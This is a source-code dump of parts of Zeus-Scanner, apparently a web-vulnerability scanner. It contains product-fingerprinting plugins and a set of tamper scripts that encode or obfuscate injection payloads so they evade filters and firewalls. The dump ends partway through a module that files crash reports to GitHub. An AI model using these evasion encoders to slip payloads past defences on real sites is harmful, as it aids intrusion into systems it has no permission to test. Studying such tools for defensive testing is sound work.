25 | return True
26 |
--------------------------------------------------------------------------------
/lib/plugins/3dcart.py:
--------------------------------------------------------------------------------
1 | import re
2 |
3 | import lib.core.common
4 |
5 |
6 | __product__ = "3dcart"
7 | __description__ = (
8 | "The 3dcart Shopping Cart Software is a complete e-commerce solution for anyone."
9 | )
10 |
11 |
12 | def search(html, **kwargs):
13 | html = str(html)
14 | headers = kwargs.get("headers", None)
15 | plugin_detection_schema = (
16 | re.compile(r"3dcart.stats", re.I),
17 | re.compile(r"/3dvisit/", re.I)
18 | )
19 | for plugin in plugin_detection_schema:
20 | if plugin.search(html) is not None:
21 | return True
22 | if plugin.search(headers.get(lib.core.common.HTTP_HEADER.SET_COOKIE, "")) is not None:
23 | return True
24 |
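
The plugin modules mirror the firewall convention: each exposes `search(html, **kwargs)` plus `__product__`/`__description__` metadata, so fingerprinting is again a generic sweep. A hypothetical runner under that assumption (not the project's actual loader):

    import importlib

    def fingerprint(html, headers, plugins=("3dcart", "jquery", "moodle")):
        # collect every product whose search() matches; sample subset only
        hits = []
        for name in plugins:
            plugin = importlib.import_module("lib.plugins.{}".format(name))
            if plugin.search(html, headers=headers):
                hits.append(plugin.__product__)
        return hits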
--------------------------------------------------------------------------------
/lib/plugins/4d.py:
--------------------------------------------------------------------------------
1 | import re
2 |
3 | import lib.core.common
4 |
5 |
6 | __product__ = "4D"
7 | __description__ = (
8 | "4D web application deployment server"
9 | )
10 |
11 |
12 | def search(html, **kwargs):
13 | headers = kwargs.get("headers", None)
14 | plugin_detection_schema = (
15 | re.compile(r"/^4D_v[\d]{1,2}(_SQL)?\/([\d\.]+)$/", re.I),
16 | )
17 | for plugin in plugin_detection_schema:
18 | if plugin.search(headers.get(lib.core.common.HTTP_HEADER.SERVER, "")) is not None:
19 | return True
20 |
--------------------------------------------------------------------------------
/lib/plugins/4images.py:
--------------------------------------------------------------------------------
1 | import re
2 |
3 |
4 | __product__ = "4images"
5 | __description__ = (
6 | "4images is a powerful web-based image gallery "
7 | "management system. Features include comment system, "
8 | "user registration and management, password protected "
9 | "administration area with browser-based upload and HTML "
10 | "templates for page layout and design."
11 | )
12 |
13 |
14 | def search(html, **kwargs):
15 | html = str(html)
16 | plugin_protection_schema = (
17 | re.compile(r"http(s)?.//(www.)?4homepages.\w+", re.I),
18 | re.compile(r"powered.by.<.+>4images<.+.>", re.I),
19 | re.compile(r"powered.by.4images", re.I)
20 | )
21 | for plugin in plugin_protection_schema:
22 | if plugin.search(html) is not None:
23 | return True
24 |
--------------------------------------------------------------------------------
/lib/plugins/68classified.py:
--------------------------------------------------------------------------------
1 | import re
2 |
3 |
4 | __product__ = "68-Classifieds-Script"
5 | __description__ = (
6 | "68 Classifieds Script - Requires PHP"
7 | )
8 |
9 |
10 | def search(html, **kwargs):
11 | html = str(html)
12 | plugin_detection_schema = (
13 | re.compile(r"http(s)?.//(www.)?68classifieds.com", re.I),
14 | re.compile(r"68.classifieds.script", re.I),
15 | re.compile(r"68.classifieds", re.I)
16 | )
17 | for plugin in plugin_detection_schema:
18 | if plugin.search(html) is not None:
19 | return True
20 |
--------------------------------------------------------------------------------
/lib/plugins/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Ekultek/Zeus-Scanner/21b87563062326cd480669f2922f650173a2a18e/lib/plugins/__init__.py
--------------------------------------------------------------------------------
/lib/plugins/aardvark.py:
--------------------------------------------------------------------------------
1 | import re
2 |
3 |
4 | __product__ = "Aardvark-Topsites-PHP"
5 | __description__ = (
6 | "Aardvark Topsites PHP is a free topsites script built on PHP and MySQL"
7 | )
8 |
9 |
10 | def search(html, **kwargs):
11 | html = str(html)
12 | plugin_detection_schema = (
13 | re.compile(r"powered.by.aardvark.topsites.php", re.I),
14 | re.compile(r"aardvark.topsites.php", re.I),
15 | re.compile(r"http(s)?.//(www.)?aardvarktopsitesphp.com", re.I)
16 | )
17 | for plugin in plugin_detection_schema:
18 | if plugin.search(html) is not None:
19 | return True
20 |
--------------------------------------------------------------------------------
/lib/plugins/abyss.py:
--------------------------------------------------------------------------------
1 | import re
2 |
3 | import lib.core.common
4 |
5 |
6 | __product__ = "Abyss-Web-Server"
7 | __description__ = (
8 | "Abyss Web Server is a compact web server available "
9 | "for Windows, Mac OS X, Linux, and FreeBSD operating systems"
10 | )
11 |
12 |
13 | def search(html, **kwargs):
14 | headers = kwargs.get("headers", None)
15 | plugin_detection_schema = (
16 | re.compile(r"/^Abyss\/([^\s]+)/", re.I),
17 | )
18 | for plugin in plugin_detection_schema:
19 | if plugin.search(headers.get(lib.core.common.HTTP_HEADER.SERVER, "")) is not None:
20 | return True
21 |
--------------------------------------------------------------------------------
/lib/plugins/accellion.py:
--------------------------------------------------------------------------------
1 | import re
2 |
3 | import lib.core.common
4 |
5 |
6 | __product__ = "Accellion-Secure-File-Transfer"
7 | __description__ = (
8 | "Accellion Secure File Transfer (SFT)"
9 | )
10 |
11 |
12 | def search(html, **kwargs):
13 | headers = kwargs.get("headers", None)
14 | plugin_detection_schema = (
15 | re.compile(r"/sfcurl.deleted./", re.I),
16 | re.compile(r"/\/courier\/[\d]+@\/mail_user_login\.html\?$/", re.I),
17 | )
18 | for plugin in plugin_detection_schema:
19 | if plugin.search(headers.get(lib.core.common.HTTP_HEADER.LOCATION, "")) is not None:
20 | return True
21 | if plugin.search(headers.get(lib.core.common.HTTP_HEADER.SET_COOKIE, "")) is not None:
22 | return True
23 |
--------------------------------------------------------------------------------
/lib/plugins/atomfeed.py:
--------------------------------------------------------------------------------
1 | import re
2 |
3 |
4 | __product__ = "Atom Feed"
5 | __description__ = (
6 | "Atom Feeds allow software programs to check for updates published on a website"
7 | )
8 |
9 |
10 | def search(html, **kwargs):
11 | html = str(html)
12 | plugin_detection_schema = (
13 | re.compile(r"type.[\'\"]?application/atom.xml[\'\"]?", re.I),
14 | )
15 | for plugin in plugin_detection_schema:
16 | if plugin.search(html) is not None:
17 | return True
18 | 
--------------------------------------------------------------------------------
/lib/plugins/bmcremedy.py:
--------------------------------------------------------------------------------
1 | import re
2 | 
3 | 
4 | __product__ = "BMC Remedy"
5 | __description__ = (
6 | "BMC Remedy Action Request System, a web based IT service management platform"
7 | )
8 | 
9 | 
10 | def search(html, **kwargs):
11 | html = str(html)
12 | plugin_detection_schema = (
13 | re.compile(r"bmc.\w+.remedy.\w+.mid.\w+.tier.\w+.\d+.\d+...login<.+.>", re.I),
14 | re.compile(r".bmc.remedy.action.request.system.", re.I),
15 | re.compile(r"class.[\'\"]?caption[\'\"]?.\W{1,3}\w+..[0-9]{4}.bmc.software[,]?.inc[orporated]?.", re.I)
16 | )
17 | for plugin in plugin_detection_schema:
18 | if plugin.search(html) is not None:
19 | return True
20 | 
--------------------------------------------------------------------------------
/lib/plugins/bomgar.py:
--------------------------------------------------------------------------------
1 | import re
2 |
3 | import lib.core.common
4 |
5 |
6 | __product__ = "Bomgar"
7 | __description__ = (
8 | "Bomgar simplifies support by letting technicians control "
9 | "remote computers, servers, smartphones and network devices "
10 | "over the internet or network. With Bomgar, a support rep can "
11 | "see what customers see or control their computers for support"
12 | )
13 |
14 |
15 | def search(html, **kwargs):
16 | html = str(html)
17 | headers = kwargs.get("headers", None)
18 | plugin_detection_schema = (
19 | re.compile(".bomgar.", re.I),
20 | re.compile(r"http(s)?.//(www.)?bomgar.com", re.I),
21 | re.compile(r"alt.[\'\"]?remote.support.by.bomgar[\'\"]?", re.I)
22 | )
23 | for plugin in plugin_detection_schema:
24 | if plugin.search(headers.get(lib.core.common.HTTP_HEADER.SERVER, "")) is not None:
25 | return True
26 | if plugin.search(html) is not None:
27 | return True
28 |
--------------------------------------------------------------------------------
/lib/plugins/clipbucket.py:
--------------------------------------------------------------------------------
1 | import re
2 |
3 |
4 | __product__ = "ClipBucket"
5 | __description__ = (
6 | "ClipBucket is an Open Source and freely downloadable PHP "
7 | "script that will let you start your own Video Sharing website"
8 | )
9 |
10 |
11 | def search(html, **kwargs):
12 | html = str(html)
13 | plugin_detection_schema = (
14 | re.compile(r"<.\S+.clipbucket", re.I),
15 | re.compile(r"content.[\'\"]clipbucket", re.I),
16 | re.compile(r"http(s)?.//(www.)?clip.bucket.com", re.I),
17 | re.compile(r"http(s)?.//(www.)?clipbucket.com", re.I),
18 | )
19 | for plugin in plugin_detection_schema:
20 | if plugin.search(html) is not None:
21 | return True
22 |
--------------------------------------------------------------------------------
/lib/plugins/googleapi.py:
--------------------------------------------------------------------------------
1 | import re
2 |
3 |
4 | __product__ = "Google API"
5 | __description__ = (
6 | "Google APIs is a set of application programming interfaces (APIs) developed by Google "
7 | "which allow communication with Google Services and their integration to other services"
8 | )
9 |
10 |
11 | def search(html, **kwargs):
12 | html = str(html)
13 | plugin_detection_schema = (
14 | re.compile(r"src.[\'\"]?http(s)?.//googleapis.com", re.I),
15 | re.compile(r"src.[\'\"]?http(s)?.//ajax.googleapis.com", re.I),
16 | re.compile(r".googleapis.", re.I)
17 | )
18 | for plugin in plugin_detection_schema:
19 | if plugin.search(html) is not None:
20 | return True
21 |
--------------------------------------------------------------------------------
/lib/plugins/html5.py:
--------------------------------------------------------------------------------
1 | import re
2 |
3 |
4 | __product__ = "HTML5"
5 | __description__ = (
6 | "HTML5 is a markup language used for structuring and presenting "
7 | "content on the World Wide Web. It is the fifth and current major "
8 | "version of the HTML standard."
9 | )
10 |
11 |
12 | def search(html, **kwargs):
13 | html = str(html)
14 | plugin_detection_schema = (
15 | re.compile(r".html5.", re.I),
16 | re.compile(r"\bhtml\d+", re.I)
17 | )
18 | for plugin in plugin_detection_schema:
19 | if plugin.search(html) is not None:
20 | return True
21 |
--------------------------------------------------------------------------------
/lib/plugins/ihtml.py:
--------------------------------------------------------------------------------
1 | import re
2 |
3 | import lib.core.common
4 |
5 |
6 | __product__ = "iHTML"
7 | __description__ = (
8 | "iHTML is a server side internet/web programming and scripting "
9 | "language in used by thousands of sites worldwide to deliver "
10 | "cost effective dynamic database driven web sites"
11 | )
12 |
13 |
14 | def search(html, **kwargs):
15 | html = str(html)
16 | headers = kwargs.get("headers", None)
17 | plugin_detection_schema = (
18 | re.compile(r".ihtml.", re.I),
19 | re.compile(r"\bihtml.", re.I)
20 | )
21 | for plugin in plugin_detection_schema:
22 | if plugin.search(html) is not None:
23 | return True
24 | if plugin.search(headers.get(lib.core.common.HTTP_HEADER.X_POWERED_BY, "")) is not None:
25 | return True
26 |
--------------------------------------------------------------------------------
/lib/plugins/jquery.py:
--------------------------------------------------------------------------------
1 | import re
2 |
3 |
4 | __product__ = "JQuery"
5 | __description__ = (
6 | "A fast, concise, JavaScript that simplifies how to traverse "
7 | "HTML documents, handle events, perform animations, and add AJAX"
8 | )
9 |
10 |
11 | def search(html, **kwargs):
12 | html = str(html)
13 | plugin_detection_schema = (
14 | re.compile(r"src.[\'\"]?http(s)?.//ajax.googleapis.com.ajax.libs.jquery.\d.\d.\d", re.I),
15 | re.compile(r".jquery.", re.I),
16 | re.compile(r"jquery.min.js", re.I)
17 | )
18 | for plugin in plugin_detection_schema:
19 | if plugin.search(html) is not None:
20 | return True
21 |
--------------------------------------------------------------------------------
/lib/plugins/moodle.py:
--------------------------------------------------------------------------------
1 | import re
2 |
3 |
4 | __product__ = "Moodle"
5 | __description__ = (
6 | "Moodle is an opensource educational software written in PHP"
7 | )
8 |
9 |
10 | def search(html, **kwargs):
11 | html = str(html)
12 | plugin_detection_schema = (
13 | re.compile(r".moodle.", re.I),
14 | re.compile(r".moodlesession.", re.I),
15 | re.compile(r".php.moodlesession.(\w+)?(\d+)?", re.I)
16 | )
17 | for plugin in plugin_detection_schema:
18 | if plugin.search(html) is not None:
19 | return True
20 |
--------------------------------------------------------------------------------
/lib/plugins/mssqlreportmanager.py:
--------------------------------------------------------------------------------
1 | import re
2 |
3 |
4 | __product__ = "Microsoft SQL Report Manager"
5 | __description__ = (
6 | "Microsoft SQL Server Report Manager - web-based report access and management tool"
7 | )
8 |
9 |
10 | def search(html, **kwargs):
11 | html = str(html)
12 | plugin_detection_schema = (
13 | re.compile(r"content.[\'\"]?microsoft.sql.server.report", re.I),
14 | re.compile(r"microsoft.sql.server.report.manager", re.I)
15 | )
16 | for plugin in plugin_detection_schema:
17 | if plugin.search(html) is not None:
18 | return True
19 |
--------------------------------------------------------------------------------
/lib/plugins/opengraph.py:
--------------------------------------------------------------------------------
1 | import re
2 |
3 |
4 | __product__ = "Open-Graph-Protocol"
5 | __description__ = (
6 | "The Open Graph protocol enables you to integrate "
7 | "your Web pages into the social graph. It is currently "
8 | "designed for Web pages representing profiles of real-world "
9 | "things. Things like movies, sports teams, celebrities, "
10 | "and restaurants. Including Open Graph tags on your Web page, "
11 | "makes your page equivalent to a Facebook Page"
12 | )
13 |
14 |
15 | def search(html, **kwargs):
16 | html = str(html)
17 | plugin_detection_schema = (
18 | re.compile(r".og.title.", re.I),
19 | re.compile(".fb.admins.", re.I),
20 | re.compile(r".og.type.", re.I),
21 | re.compile(r".fb.app.id.", re.I)
22 | )
23 | for plugin in plugin_detection_schema:
24 | if plugin.search(html) is not None:
25 | return True
26 |
--------------------------------------------------------------------------------
/lib/plugins/openxchange.py:
--------------------------------------------------------------------------------
1 | import re
2 |
3 | import lib.core.common
4 |
5 |
6 | __product__ = "Open-Xchange-Server"
7 | __description__ = (
8 | "Open Xchange Mail Server"
9 | )
10 |
11 |
12 | def search(html, **kwargs):
13 | html = str(html)
14 |     headers = kwargs.get("headers", None) or {}  # avoid an AttributeError when no headers are passed
15 | plugin_detection_schema = (
16 | re.compile(r"open.xchange.server", re.I),
17 | re.compile(r"javascript.to.access.the.open.xchange.server", re.I),
18 | re.compile(r"/^http(s)?://(www.)?[^\/]+\/ox6\/ox\.html$/", re.I)
19 | )
20 | for plugin in plugin_detection_schema:
21 | if plugin.search(html) is not None:
22 | return True
23 | if plugin.search(headers.get(lib.core.common.HTTP_HEADER.LOCATION, "")) is not None:
24 | return True
25 |
--------------------------------------------------------------------------------
/lib/plugins/rssfeed.py:
--------------------------------------------------------------------------------
1 | import re
2 |
3 |
4 | __product__ = "RSS Feed"
5 | __description__ = (
6 | "RSS (Rich Site Summary) is a type of web feed which allows "
7 | "users to access updates to online content in a standardized, "
8 | "computer-readable format"
9 | )
10 |
11 |
12 | def search(html, **kwargs):
13 | html = str(html)
14 | plugin_detection_schema = (
15 | re.compile(r"type.[\'\"]?application/rss.xml[\'\"]?", re.I),
16 | re.compile(r"title.[\'\"]?rss.feed[\'\"]?", re.I)
17 | )
18 | for plugin in plugin_detection_schema:
19 | if plugin.search(html) is not None:
20 | return True
21 |
--------------------------------------------------------------------------------
/lib/tamper_scripts/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Ekultek/Zeus-Scanner/21b87563062326cd480669f2922f650173a2a18e/lib/tamper_scripts/__init__.py
--------------------------------------------------------------------------------
/lib/tamper_scripts/appendnull_encode.py:
--------------------------------------------------------------------------------
1 | def tamper(payload, **kwargs):
2 | return "{}%00".format(payload.strip())
--------------------------------------------------------------------------------
/lib/tamper_scripts/base64_encode.py:
--------------------------------------------------------------------------------
1 | import base64
2 |
3 | from lib.core.settings import (
4 | logger,
5 | set_color
6 | )
7 |
8 |
9 | def tamper(payload, **kwargs):
10 | warning = kwargs.get("warning", True)
11 | if warning:
12 | logger.warning(set_color(
13 | "base64 tamper scripts may increase the possibility of not finding vulnerabilities "
14 | "in otherwise vulnerable sites", level=30
15 | ))
16 | return base64.b64encode(payload)
--------------------------------------------------------------------------------
/lib/tamper_scripts/enclosebrackets_encode.py:
--------------------------------------------------------------------------------
1 | import string
2 |
3 | from lib.core.settings import (
4 | logger,
5 | set_color
6 | )
7 |
8 |
9 | def tamper(payload, **kwargs):
10 | warning = kwargs.get("warning", True)
11 |
12 | if warning:
13 | logger.warning(set_color(
14 | "enclosing brackets is meant to be used as an obfuscation "
15 | "against an already valid vulnerable site", level=30
16 | ))
17 |
18 | to_enclose = string.digits
19 | retval = ""
20 | for char in payload:
21 | if char in to_enclose:
22 | char = "['{}']".format(char)
23 | retval += char
24 | else:
25 | retval += char
26 | return retval
--------------------------------------------------------------------------------
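The bracket encoding only touches digits, so a typical boolean payload comes out like this (a quick sketch, assuming the repository root is on the path):

    from lib.tamper_scripts import enclosebrackets_encode

    print(enclosebrackets_encode.tamper("admin' OR 1=1 --", warning=False))
    # -> admin' OR ['1']=['1'] --

--------------------------------------------------------------------------------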
/lib/tamper_scripts/hex_encode.py:
--------------------------------------------------------------------------------
1 | import binascii
2 |
3 | from lib.core.settings import (
4 |     logger,
5 |     set_color
6 | )
7 |
8 |
9 | def tamper(payload, **kwargs):
10 |     warning = kwargs.get("warning", True)
11 |     if warning:
12 |         logger.warning(set_color(
13 |             "hex tamper scripts may increase the risk of false positives", level=30
14 |         ))
15 |     # hex encode the payload itself rather than a hash of it, so the value stays recoverable
16 |     return "0x{}".format(binascii.hexlify(payload))
17 |
--------------------------------------------------------------------------------
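With the encoder above the whole payload becomes a single 0x hex literal (a quick sketch, assuming the repository root is on the path):

    from lib.tamper_scripts import hex_encode

    print(hex_encode.tamper("admin", warning=False))  # -> 0x61646d696e

--------------------------------------------------------------------------------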
/lib/tamper_scripts/lowercase_encode.py:
--------------------------------------------------------------------------------
1 | def tamper(payload, **kwargs):
2 | return str(payload).lower()
--------------------------------------------------------------------------------
/lib/tamper_scripts/multispace2comment_encode.py:
--------------------------------------------------------------------------------
1 | import random
2 |
3 |
4 | def tamper(payload, **kwargs):
5 | possible_spaces = [2, 3, 4]
6 | retval = ""
7 | encoder = "/**/"
8 |     for char in payload:
9 | if char == " ":
10 | retval += encoder * random.choice(possible_spaces)
11 | else:
12 | retval += char
13 | return retval
--------------------------------------------------------------------------------
/lib/tamper_scripts/obfuscateentity_encode.py:
--------------------------------------------------------------------------------
1 | from lib.core.settings import (
2 | logger,
3 | set_color
4 | )
5 |
6 |
7 | def tamper(payload, **kwargs):
8 | warning = kwargs.get("warning", True)
9 |
10 | if warning:
11 | logger.warning(set_color(
12 | "obfuscating payloads by their entity encoding equivalent may increase the "
13 | "risk of false positives", level=30
14 | ))
15 |
16 |     encoding_schema = {
17 |         " ": "&nbsp;", "<": "&lt;", ">": "&gt;",
18 |         "&": "&amp;", '"': "&quot;", "'": "&#39;",
19 |     }
20 |     retval = ""
21 |     for char in str(payload):
22 |         if char in encoding_schema:
23 |             retval += encoding_schema[char]
24 |         else:
25 |             retval += char
26 |     return retval
30 |
--------------------------------------------------------------------------------
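Only the six characters in the schema are rewritten; everything else passes through untouched (a quick sketch, assuming the repository root is on the path):

    from lib.tamper_scripts import obfuscateentity_encode

    print(obfuscateentity_encode.tamper("<script>alert(1)</script>", warning=False))
    # -> &lt;script&gt;alert(1)&lt;/script&gt;

--------------------------------------------------------------------------------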
/lib/tamper_scripts/obfuscateordinal_encode.py:
--------------------------------------------------------------------------------
1 | from lib.core.settings import (
2 | logger,
3 | set_color
4 | )
5 |
6 |
7 | def tamper(payload, **kwargs):
8 | warning = kwargs.get("warning", True)
9 |
10 | if warning:
11 | logger.warning(set_color(
12 | "obfuscating the payloads by ordinal equivalents may increase the risk "
13 | "of false positives", level=30
14 | ))
15 |
16 | retval = ""
17 | danger_characters = "%&<>/\\;'\""
18 | for char in payload:
19 | if char in danger_characters:
20 | char = "%{}".format(ord(char) * 10 / 7)
21 | retval += char
22 | else:
23 | retval += char
24 | return retval
--------------------------------------------------------------------------------
/lib/tamper_scripts/randomcase_encode.py:
--------------------------------------------------------------------------------
1 | import random
2 |
3 |
4 | def tamper(payload, **kwargs):
5 | retval = ""
6 | nums = [0, 1]
7 |
8 |     for char in payload:
9 |         random_int = random.choice(nums)
10 |         if random_int == 1:
11 |             if char.isupper():
12 |                 retval += char.lower()
13 |             elif char.islower():
14 |                 retval += char.upper()
15 |             else:
16 |                 retval += char
17 |         else:
18 |             # keep the character as-is, otherwise roughly half the payload would be dropped
19 |             retval += char
20 |     return retval
21 |
--------------------------------------------------------------------------------
/lib/tamper_scripts/space2comment_encode.py:
--------------------------------------------------------------------------------
1 | def tamper(payload, **kwargs):
2 | retval = ""
3 | encoder = "/**/"
4 | for char in payload:
5 | if char == " ":
6 | char = encoder
7 | retval += char
8 | else:
9 | retval += char
10 | return retval
--------------------------------------------------------------------------------
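A quick example of the space-to-comment substitution (assuming the repository root is on the path):

    from lib.tamper_scripts import space2comment_encode

    print(space2comment_encode.tamper("UNION SELECT user, password"))
    # -> UNION/**/SELECT/**/user,/**/password

--------------------------------------------------------------------------------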
/lib/tamper_scripts/space2null_encode.py:
--------------------------------------------------------------------------------
1 | from lib.core.settings import (
2 | logger,
3 | set_color
4 | )
5 |
6 |
7 | def tamper(payload, **kwargs):
8 | warning = kwargs.get("warning", True)
9 | if warning:
10 | logger.warning(set_color(
11 | "NULL encoding tamper scripts may increase the possibility of not finding vulnerabilities "
12 | "in otherwise vulnerable sites", level=30
13 | ))
14 |
15 | retval = ""
16 | encoder = "%00"
17 | for char in payload:
18 | if char == " ":
19 | char = encoder
20 | retval += char
21 | else:
22 | retval += char
23 | return retval
--------------------------------------------------------------------------------
/lib/tamper_scripts/unicode_encode.py:
--------------------------------------------------------------------------------
1 | def tamper(payload, **kwargs):
2 |     retval = ""
3 |     for char in payload:
4 |         # %u encoding expects four hex digits, e.g. "A" becomes "%u0041"
5 |         retval += "%u{0:04x}".format(ord(char))
6 |     return retval
7 |
--------------------------------------------------------------------------------
/lib/tamper_scripts/uppercase_encode.py:
--------------------------------------------------------------------------------
1 | def tamper(payload, **kwargs):
2 | return str(payload).upper()
--------------------------------------------------------------------------------
/lib/tamper_scripts/url_encode.py:
--------------------------------------------------------------------------------
1 | # coding=utf-8
2 |
3 |
4 | def tamper(payload, safe="%&=-_", **kwargs):
5 | encodings = {
6 | " ": "%20", "!": "%21", '"': "%22", "#": "%23", "$": "%24", "%": "%25", "'": "%27",
7 | "(": "%28", ")": "%29", "*": "%2A", "+": "%2B", ",": "%2C", ".": "%2E", "/": "%2F",
8 | "0": "%30", "1": "%31", "2": "%32", "3": "%33", "4": "%34", "5": "%35", "6": "%36", "7": "%37",
9 | "8": "%38", "9": "%39", ":": "%3A", ";": "%3B", "<": "%3C", ">": "%3E", "?": "%3F",
10 | "@": "%40", "A": "%41", "B": "%42", "C": "%43", "D": "%44", "E": "%45", "F": "%46", "G": "%47",
11 | "H": "%48", "I": "%49", "J": "%4A", "K": "%4B", "L": "%4C", "M": "%4D", "N": "%4E", "O": "%4F",
12 | "P": "%50", "Q": "%51", "R": "%52", "S": "%53", "T": "%54", "U": "%55", "V": "%56", "W": "%57",
13 | "X": "%58", "Y": "%59", "Z": "%5A", "[": "%5B", "\\": "%5C", "]": "%5D", "^": "%5E", "a": "%61",
14 | "b": "%62", "c": "%63", "d": "%64", "e": "%65", "f": "%66", "g": "%67", "h": "%68", "i": "%69",
15 | "j": "%6A", "k": "%6B", "l": "%6C", "m": "%6D", "n": "%6E", "o": "%6F", "p": "%70", "q": "%71",
16 | "r": "%72", "s": "%73", "t": "%74", "u": "%75", "v": "%76", "w": "%77", "x": "%78", "y": "%79",
17 | "z": "%7A", "{": "%7B", "|": "%7C", "}": "%7D", "~": "%7E", "`": "%80", "": "%81", "‚": "%82",
18 | "ƒ": "%83", "„": "%84", "…": "%85", "†": "%86", "‡": "%87", "ˆ": "%88", "‰": "%89", "Š": "%8A",
19 | "‹": "%8B", "Œ": "%8C", "Ž": "%8E", "‘": "%91", "’": "%92", "“": "%93", "”": "%94", "•": "%95",
20 | "–": "%96", "—": "%97", "˜": "%98", "™": "%99", "š": "%9A", "›": "%9B", "œ": "%9C", "ž": "%9E",
21 | "Ÿ": "%9F", "¡": "%A1", "¢": "%A2", "£": "%A3", "¤": "%A4", "¥": "%A5", "¦": "%A6", "§": "%A7",
22 | "¨": "%A8", "©": "%A9", "ª": "%AA", "«": "%AB", "¬": "%AC", "": "%AD", "®": "%AE", "¯": "%AF",
23 | "°": "%B0", "±": "%B1", "²": "%B2", "³": "%B3", "´": "%B4", "µ": "%B5", "¶": "%B6", "·": "%B7",
24 | "¸": "%B8", "¹": "%B9", "º": "%BA", "»": "%BB", "¼": "%BC", "½": "%BD", "¾": "%BE", "¿": "%BF",
25 | "À": "%C0", "Á": "%C1", "Â": "%C2", "Ã": "%C3", "Ä": "%C4", "Å": "%C5", "Æ": "%C6", "Ç": "%C7",
26 | "È": "%C8", "É": "%C9", "Ê": "%CA", "Ë": "%CB", "Ì": "%CC", "Í": "%CD", "Î": "%CE", "Ï": "%CF",
27 | "Ð": "%D0", "Ñ": "%D1", "Ò": "%D2", "Ó": "%D3", "Ô": "%D4", "Õ": "%D5", "Ö": "%D6", "×": "%D7",
28 | "Ø": "%D8", "Ù": "%D9", "Ú": "%DA", "Û": "%DB", "Ü": "%DC", "Ý": "%DD", "Þ": "%DE", "ß": "%DF",
29 | "à": "%E0", "á": "%E1", "â": "%E2", "ã": "%E3", "ä": "%E4", "å": "%E5", "æ": "%E6", "ç": "%E7",
30 | "è": "%E8", "é": "%E9", "ê": "%EA", "ë": "%EB", "ì": "%EC", "í": "%ED", "î": "%EE", "ï": "%EF",
31 | "ð": "%F0", "ñ": "%F1", "ò": "%F2", "ó": "%F3", "ô": "%F4", "õ": "%F5", "ö": "%F6", "÷": "%F7",
32 | "ø": "%F8", "ù": "%F9", "ú": "%FA", "û": "%FB", "ü": "%FC", "ý": "%FD", "þ": "%FE", "ÿ": "%FF"
33 | }
34 | retval = ""
35 | if isinstance(payload, unicode):
36 | payload = str(payload)
37 | for char in payload:
38 | if char not in safe:
39 | try:
40 | retval += encodings[char]
41 | except KeyError:
42 | retval += char
43 | else:
44 | retval += char
45 | return retval
46 |
--------------------------------------------------------------------------------
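Characters in the safe string ("%&=-_") are left alone; everything else is swapped for its percent-encoded form from the table above (a quick sketch, assuming the repository root is on the path):

    from lib.tamper_scripts import url_encode

    print(url_encode.tamper("1 AND 1=1"))  # -> %31%20%41%4E%44%20%31=%31

--------------------------------------------------------------------------------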
/requirements.txt:
--------------------------------------------------------------------------------
1 | selenium==3.5.0
2 | requests==2.12.2
3 | python-nmap==0.6.1
4 | whichcraft==0.4.1
5 | pyvirtualdisplay==0.2.1
6 | lxml==3.7.3
7 | psutil==5.0.1
8 | beautifulsoup4==4.6.0
--------------------------------------------------------------------------------
/var/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Ekultek/Zeus-Scanner/21b87563062326cd480669f2922f650173a2a18e/var/__init__.py
--------------------------------------------------------------------------------
/var/auto_issue/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Ekultek/Zeus-Scanner/21b87563062326cd480669f2922f650173a2a18e/var/auto_issue/__init__.py
--------------------------------------------------------------------------------
/var/auto_issue/github.py:
--------------------------------------------------------------------------------
1 | import re
2 | import sys
3 | try:
4 | import urllib2 # python 2
5 | except ImportError:
6 | import urllib.request as urllib2 # python 3
7 | import json
8 | import platform
9 |
10 | import requests
11 | from bs4 import BeautifulSoup
12 |
13 | import lib.core.common
14 | import lib.core.settings
15 |
16 |
17 | def find_url(params, search="https://github.com/ekultek/zeus-scanner/issues"):
18 | """
19 | get the URL that your issue is created at
20 | """
21 | retval = "https://github.com{}"
22 | href = None
23 | searcher = re.compile(params, re.I)
24 | req = requests.get(search)
25 | status, html = req.status_code, req.content
26 | if status == 200:
27 | split_information = str(html).split("\n")
28 | for i, line in enumerate(split_information):
29 | if searcher.search(line) is not None:
30 | href = split_information[i-1]
31 | if href is not None:
32 | soup = BeautifulSoup(href, "html.parser")
33 | for item in soup.findAll("a"):
34 | link = item.get("href")
35 | return retval.format(link)
36 | return None
37 |
38 |
39 | def request_issue_creation():
40 | if not lib.core.settings.get_md5sum():
41 | lib.core.settings.logger.fatal(lib.core.settings.set_color(
42 | "it appears that your checksums did not match, therefore it is assumed "
43 | "that you have edited some of the code, issue request denied", level=50
44 | ))
45 | lib.core.common.shutdown()
46 |
47 | question = lib.core.common.prompt(
48 | "would you like to create an anonymous issue and post it to Zeus's Github", opts="yN"
49 | )
50 | if question.lower().startswith("n"):
51 | lib.core.settings.logger.error(lib.core.settings.set_color(
52 | "Zeus has experienced an internal error and cannot continue, shutting down", level=40
53 | ))
54 | lib.core.common.shutdown()
55 |
56 | lib.core.settings.fix_log_file()
57 | lib.core.settings.logger.info(lib.core.settings.set_color(
58 | "Zeus got an unexpected error and will automatically create an issue for this error, please wait"
59 | ))
60 |
61 | def __extract_stacktrace(file_data):
62 | lib.core.settings.logger.info(lib.core.settings.set_color(
63 | "extracting traceback from log file"
64 | ))
65 | retval, buff_mode, _buffer = [], False, ""
66 | with open(file_data, "r+") as log:
67 | for line in log:
68 | if "Traceback" in line:
69 | buff_mode = True
70 | if line and len(line) < 5:
71 | buff_mode = False
72 | retval.append(_buffer)
73 | _buffer = ""
74 | if buff_mode:
75 | if len(line) > 400:
76 | line = line[:400] + "\n"
77 | _buffer += line
78 | return "".join(retval)
79 |
80 | lib.core.settings.logger.info(lib.core.settings.set_color(
81 | "getting authorization"
82 | ))
83 |
84 | token = lib.core.settings.get_token(lib.core.settings.GITHUB_AUTH_PATH)
85 |
86 | current_log_file = lib.core.settings.get_latest_log_file(lib.core.settings.CURRENT_LOG_FILE_PATH)
87 | stacktrace = __extract_stacktrace(current_log_file)
88 | identifier = lib.core.settings.create_identifier(stacktrace)
89 | issue_title = "Unhandled exception ({})".format(identifier)
90 | ff_version = lib.core.settings.get_browser_version()
91 | log_file_information = lib.core.settings.tails(current_log_file)
92 |
93 | issue_data = {
94 | "title": issue_title,
95 | "body": "Zeus version:\n`{}`\n\n"
96 | "Firefox version:\n`{}`\n\n"
97 | "Geckodriver version:\n`{}`\n\n"
98 | "Error info:\n```{}```\n\n"
